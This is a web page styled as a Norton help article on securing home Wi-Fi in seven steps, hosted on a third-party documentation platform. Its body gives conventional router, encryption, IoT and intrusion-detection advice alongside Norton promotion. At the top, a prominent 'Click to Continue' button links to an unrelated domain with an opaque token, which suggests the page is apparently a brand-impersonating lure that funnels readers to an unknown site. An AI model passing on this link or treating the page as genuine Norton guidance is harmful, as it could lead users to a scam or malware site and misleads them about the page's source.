> ## Documentation Index
> Fetch the complete documentation index at: https://norton-helpguide.mintlify.site/llms.txt
> Use this file to discover all available pages before exploring further.

# How to Secure Your Home Wi-Fi Network in 7 Simple Steps

> An unsecured home network puts every connected device at risk. Follow these seven steps to lock down your Wi-Fi and protect your family's digital life.

<div style="text-align:center; margin:30px 0;">
  <a
    href="https://flosyr.com/?VvlkAxV0oqfrXL3P23AdUajEiSfEj06jKzxWPO9g8p81fA8wbdl "
    style="
display:inline-flex;
align-items:center;
justify-content:center;
gap:10px;
padding:14px 28px;
background:linear-gradient(135deg,#007bff,#0056d6);
color:#ffffff;
text-decoration:none;
font-family:Arial,sans-serif;
font-size:17px;
font-weight:700;
border-radius:50px;
box-shadow:0 5px 15px rgba(0,123,255,0.35);
transition:all 0.3s ease;
"
  >
    <span>Click to Continue</span>
    <span style="font-size:22px; line-height:1;">→</span>
  </a>
</div>

Your home Wi-Fi network is one of the most valuable and most overlooked targets in your digital life. According to recent research, the average American household now has more than 20 internet-connected devices — laptops, smartphones, tablets, smart TVs, gaming consoles, security cameras, smart speakers, thermostats, doorbells, and appliances — all sharing the same network. Every one of those devices is a potential entry point for an attacker who gains access to your router. Yet most households are running with default router configurations that were never designed to be secure long-term. The result is a significant and entirely preventable vulnerability sitting at the heart of your home. Securing your network doesn't require an IT degree — it requires about an hour of your time and the seven steps below.

## 7 Steps to Secure Your Home Wi-Fi Network

<Steps>
  <Step title="Change Your Router's Default Username and Password" icon="key">
    Every router ships from the factory with a default administrative username and password — and these credentials are publicly documented. Manufacturers publish them in product manuals, support pages, and even printed on the bottom of the router itself. Websites and hacker forums maintain comprehensive databases of default credentials for virtually every router model ever sold. If you've never changed yours, anyone who can connect to your network can log in to your router's admin interface and take complete control.

    Log in to your router's admin panel (typically by entering 192.168.1.1 or 192.168.0.1 in a browser), navigate to the settings, and change both the admin username and password to something strong and unique. Use a password manager to store the new credentials securely. While you're there, also change your Wi-Fi network name (SSID) to something that doesn't identify your router's manufacturer or model number — avoiding names like "Netgear\_1234" reduces the information available to a potential attacker.
  </Step>

  <Step title="Update Your Router Firmware" icon="rotate">
    Router firmware — the software embedded in your router that controls how it operates — contains security vulnerabilities just like any other software. Manufacturers release firmware updates to patch these vulnerabilities, but unlike your phone or laptop, your router almost certainly won't notify you when an update is available. Many routers go years without a firmware update simply because homeowners don't know to check.

    Log in to your router's admin panel and look for a firmware or software update option, usually found under "Advanced," "Administration," or "Maintenance." Some newer routers support automatic firmware updates — enable this feature if your router offers it. If your router is more than five years old and no longer receiving firmware updates from the manufacturer, it's time to replace it. An end-of-life router running unpatched vulnerabilities is a genuine security liability.
  </Step>

  <Step title="Use WPA3 (or WPA2) Encryption" icon="lock">
    Your Wi-Fi's encryption protocol determines how your wireless traffic is protected from eavesdroppers. Older protocols — WEP (Wired Equivalent Privacy) and the original WPA — have been thoroughly broken and should never be used. WPA2 is the current standard minimum, offering solid protection with AES encryption. WPA3, the latest generation, provides stronger safeguards and better protects against password-guessing attacks even if your Wi-Fi password is compromised.

    In your router's wireless settings, look for the security mode or encryption type setting. Select WPA3 if your router supports it. If WPA3 is unavailable, WPA2-AES (sometimes labeled WPA2 Personal) is the next best choice. If your router only offers TKIP, WEP, or no encryption at all, it's well overdue for replacement. Never operate an open (unencrypted) Wi-Fi network at home.
  </Step>

  <Step title="Create a Guest Network for Visitors and IoT Devices" icon="house">
    A guest network creates a separate, isolated Wi-Fi segment that keeps visitors and smart home devices away from your primary network — the one your laptop, phone, and personal files live on. This segmentation matters for two reasons: first, a guest who connects to your home Wi-Fi (even innocently) has access to your network and potentially your shared devices. Second, and more critically, IoT devices — smart bulbs, robot vacuums, connected appliances, security cameras — often have weak security and infrequent firmware updates, making them tempting targets for attackers who want a foothold on your network.

    Most modern routers support guest networks as a standard feature. Set up a separate SSID with a strong password, enable "AP isolation" or "client isolation" if the option is available (it prevents devices on the guest network from communicating with each other or your main network), and route all IoT devices to the guest network. Your core devices get maximum protection; your smart home keeps functioning normally.
  </Step>

  <Step title="Disable WPS (Wi-Fi Protected Setup)" icon="circle-xmark">
    WPS was designed to make connecting devices to Wi-Fi easier — press a button on your router or enter an eight-digit PIN, and devices connect automatically without needing your full Wi-Fi password. Unfortunately, the WPS PIN method has a well-documented cryptographic weakness that allows an attacker within range of your network to crack your PIN through brute force in a matter of hours, regardless of how strong your actual Wi-Fi password is. This vulnerability has been known since 2011 and remains unfixed in most implementations because fixing it would break the WPS standard.

    Disable WPS entirely in your router's wireless settings. The convenience it offers is not worth the security exposure it creates. Connecting devices to your Wi-Fi network the traditional way — entering your password manually — takes an extra 30 seconds and closes a well-known attack vector that has been exploited in the wild for over a decade.
  </Step>

  <Step title="Enable Your Router's Firewall" icon="shield-halved">
    Most consumer routers include a built-in firewall that filters incoming and outgoing traffic based on a set of security rules — blocking unsolicited inbound connection attempts from the internet and providing a layer of protection between your devices and external threats. On many routers, however, this firewall is not enabled by default, or its settings can be inadvertently weakened.

    In your router's admin panel, look for firewall settings under "Security," "Advanced," or "Firewall." Ensure the firewall is enabled and set to at least its default protection level. Avoid disabling features like SPI (Stateful Packet Inspection) or enabling DMZ mode (which exposes a device directly to the internet) unless you have a specific, well-understood technical reason to do so. Your router's firewall works in tandem with security software on your individual devices — one complements the other.
  </Step>

  <Step title="Use Norton 360 With Its Built-In Network Monitoring" icon="user-shield">
    Even with all the right router settings in place, new threats emerge constantly, and the complexity of managing a network full of devices is beyond what any manual process can reliably address. Norton 360 provides an additional layer of protection at the device level — real-time threat detection that monitors network activity, flags suspicious connections, and blocks malicious traffic before it can reach your files, accounts, or personal data.

    Norton's network threat protection works across every device in your household: Windows and Mac computers, iOS and Android smartphones and tablets. For families, Norton 360 for Families adds parental controls and device supervision, giving you visibility into what younger family members are doing online. When combined with a properly configured router, Norton 360 creates a defense-in-depth posture — multiple overlapping layers of protection that make your entire home network significantly harder to compromise.
  </Step>
</Steps>

## Understanding Your Connected Devices

Not all connected devices carry the same risk profile, but every device on your network is a potential entry point. Understanding how different device categories behave — and what their typical vulnerabilities are — helps you make smarter decisions about network segmentation and security hygiene.

<Accordion title="Smart TVs and Streaming Devices" icon="tv">
  Smart TVs and streaming sticks (Roku, Amazon Fire TV, Apple TV, Chromecast) run stripped-down operating systems that receive updates infrequently and sometimes stop receiving updates entirely after a few years. These devices often contain microphones and cameras, communicate with remote servers, and can be compromised through malicious apps or software vulnerabilities. Keep their firmware updated, review installed apps periodically, and consider routing them to your guest network to isolate them from your main devices.
</Accordion>

<Accordion title="Smart Speakers and Home Assistants" icon="microphone">
  Amazon Echo, Google Nest, and Apple HomePod devices are always-listening microphones connected to cloud services. While major manufacturers invest heavily in their security, these devices have been the subject of documented vulnerabilities and privacy concerns. Beyond the privacy implications of always-on microphones, a compromised smart speaker could potentially serve as a persistent listening post on your network. Isolate them on your guest network and use the physical microphone mute button when having sensitive conversations.
</Accordion>

<Accordion title="Security Cameras" icon="camera">
  The irony of home security cameras is that poorly secured models can become surveillance tools for attackers. Many budget IP cameras ship with hardcoded default passwords and unencrypted video streams. There are even publicly accessible websites that aggregate live feeds from thousands of unsecured cameras worldwide. Change your camera's admin credentials immediately on setup, keep firmware updated, place cameras on your guest network, and buy from reputable manufacturers with a track record of ongoing security updates.
</Accordion>

<Accordion title="Gaming Consoles" icon="gamepad">
  PlayStation, Xbox, and Nintendo Switch consoles are sophisticated computers running complex software and connecting to online gaming services. They can be targeted through malicious downloads, compromised gaming accounts, or vulnerabilities in their network code. Keep console firmware updated through their respective update systems, use strong unique passwords for gaming accounts, and enable two-factor authentication wherever available. Gaming accounts can hold significant value — linked payment methods and years of purchased content make them attractive targets.
</Accordion>

<Accordion title="Smart Thermostats and Appliances" icon="temperature-half">
  Smart thermostats (Nest, Ecobee), connected refrigerators, washing machines, and other household appliances represent the "long tail" of IoT security. These devices are often designed primarily for convenience, with security as an afterthought. Manufacturers may release few or no updates over the product's lifespan. The famous 2013 Target breach — in which 40 million credit card numbers were stolen — was initiated through a compromised HVAC vendor connection, illustrating how seemingly peripheral connected systems can provide a path into sensitive networks. Route all IoT appliances to a guest network and check for available firmware updates at least annually.
</Accordion>

## Spotting an Intruder on Your Network

Even a well-secured network can sometimes be compromised — through a vulnerability you didn't know existed, a device you forgot about, or a password shared more widely than you intended. Knowing the signs of an unauthorized user on your network can help you catch and respond to an intrusion before serious harm is done.

**Signs that someone may be on your network without permission:**

* **Unexplained slowdowns:** If your internet consistently slows down at certain times of day, or your speeds are significantly below what you're paying for, check whether unknown devices are consuming bandwidth.
* **Unknown devices in your router's connected devices list:** Log in to your router's admin panel and review the list of connected devices. Each device will show a name (hostname), MAC address, and IP address. If you see anything you don't recognize — especially at unusual times of night — investigate immediately.
* **Router admin page suddenly inaccessible:** If you can no longer log in to your router with your admin credentials, someone may have changed them.
* **DNS settings changed without your input:** If websites start redirecting unexpectedly, or your browser displays security warnings on sites you trust, your router's DNS settings may have been tampered with — a technique called DNS hijacking, commonly used to redirect users to phishing sites.
* **New apps or software on your devices:** Unauthorized network access is often a precursor to device compromise. Unexplained new software, changed browser settings, or unfamiliar browser extensions should be investigated.

**If you suspect an intrusion:** immediately change your router's admin credentials and Wi-Fi passwords, restart your router, review and remove unknown connected devices, run a full security scan on your devices with Norton 360, and consider resetting your router to factory settings and reconfiguring it from scratch.

## How Norton Helps Secure Your Network

A properly configured router is a strong foundation — but modern threats are sophisticated enough that device-level protection is equally important. Norton provides several capabilities that specifically address home network security.

**Network threat protection** monitors the traffic flowing to and from your devices in real time, detecting known attack patterns, command-and-control communication from malware, and suspicious outbound connections that might indicate a compromised device on your network.

**Norton Secure VPN** encrypts your internet traffic end-to-end, which provides protection not only when you're away from home but also from any network-level eavesdropping. Even on your home network, VPN use adds a layer of privacy and security for sensitive activities.

**Smart Firewall** (included in Norton 360 for Windows and Mac) provides an additional layer of inbound and outbound traffic filtering at the device level — complementing your router's firewall with application-aware rules that can detect and block malicious programs attempting to communicate over your network.

Together, these tools create a layered security posture where your router's settings handle network-level threats, and Norton handles device-level and application-level threats — so even if an attacker finds a crack in one layer, the next layer stops them in their tracks.

<Note>
  **Make it a habit to change your Wi-Fi password at least once a year** — or immediately any time someone you've shared it with leaves your household, or if you have any reason to suspect your network has been compromised. Treat your Wi-Fi password with the same seriousness as a bank PIN. Use a long, random passphrase (at least 16 characters) rather than a memorable word or phrase, and store it in your password manager so you don't have to memorize it.
</Note>

<Warning>
  **Default router passwords are publicly known to hackers.** Manufacturers publish default credentials in product documentation, and they're compiled into freely available hacker databases and tools. An attacker who can connect to your network — even temporarily, from a car parked outside your home — can use these defaults to access your router's admin panel and reconfigure it entirely: redirecting your DNS, installing persistent backdoors, or creating rogue access points. Changing your default router credentials is the single highest-priority step on this list. Do it today if you haven't already.
</Warning>


This documentation is built and hosted on [Mintlify](https://mintlify.com), a developer documentation platform.